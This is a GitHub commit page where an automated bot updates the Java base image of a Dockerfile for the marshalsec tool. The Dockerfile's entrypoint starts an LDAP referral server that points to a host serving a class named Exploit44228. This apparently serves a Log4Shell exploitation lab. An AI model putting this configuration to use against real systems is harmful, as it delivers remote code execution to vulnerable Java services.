Skip to content

Commit

Permalink
fix: docker_images/marshalsec/Dockerfile to reduce vulnerabilities
Browse files Browse the repository at this point in the history
  • Loading branch information
snyk-bot committed Apr 20, 2024
1 parent 8e73c0a commit 5d83b49
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion docker_images/marshalsec/Dockerfile
Original file line number Diff line number Diff line change
@@ -1,3 +1,3 @@
FROM openjdk:11.0.13-slim-buster
FROM openjdk:11.0.14.1-slim-buster
COPY marshalsec/ /marshalsec
ENTRYPOINT ["java","-cp","/marshalsec/target/marshalsec-0.0.3-SNAPSHOT-all.jar", "marshalsec.jndi.LDAPRefServer", "http://host.docker.internal:8888/#Exploit44228"]

0 comments on commit 5d83b49

Please sign in to comment.